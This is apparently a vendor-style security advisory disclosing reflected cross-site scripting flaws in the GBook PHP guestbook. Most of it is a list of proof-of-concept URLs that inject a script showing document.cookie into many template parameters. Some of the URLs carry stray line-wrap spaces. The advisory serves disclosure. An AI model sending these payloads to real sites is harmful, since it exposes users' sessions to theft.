Cross-site Scripting (XSS) Vulnerabilities in GBook PHP guestbook

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in GBook PHP guestbook which could be exploited to perform cross-site scripting attacks.

1) Cross-site scripting (XSS) vulnerabilities in GBook PHP guestbook
The vulnerability exists due to input sanitation error in the multiple parameters in scripts inside /templates/default/ directory. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that "register_globals" is enabled.
Exploitation examples:
http://[host]/templates/default/admin_reply.php?error=%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_reply.php?comments=%3C/textarea%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_reply.php?nosmileys=%3E%3Cscript%3Eale rt%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_reply.php?num=%22%3E%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?name=%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?from=%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?name=%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?email=%3Cscript%3Ealert%28docum ent.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?added=%3Cscript%3Ealert%28docum ent.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?i=%22%3E%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?error=%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?task=%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?task_description=%3Cscript%3 Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?action=%22%3E%3Cscript%3Eale rt%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?button=%22%3E%3Cscript%3Eale rt%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?num=%22%3E%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
http://[host]/templates/default/emoticons_popup.php?list_emoticons=%3Cscript %3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/error.php?myproblem=%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E
http://[host]/templates/default/error.php?backlink=%3Cscript%3Ealert%28docum ent.cookie%29;%3C/script%3E
http://[host]/templates/default/no_comments.php?lang[t06]=%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
http://[host]/templates/default/overall_footer.php?settings[pages_top]=%3Csc ript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/overall_footer.php?settings[show_nospam]=1&s ettings[target]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/overall_footer.php?settings[show_nospam]=1&s ettings[tpl_path]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/overall_header.php?settings[gbook_title]=%3C script%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/sign_form.php?name=%22%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E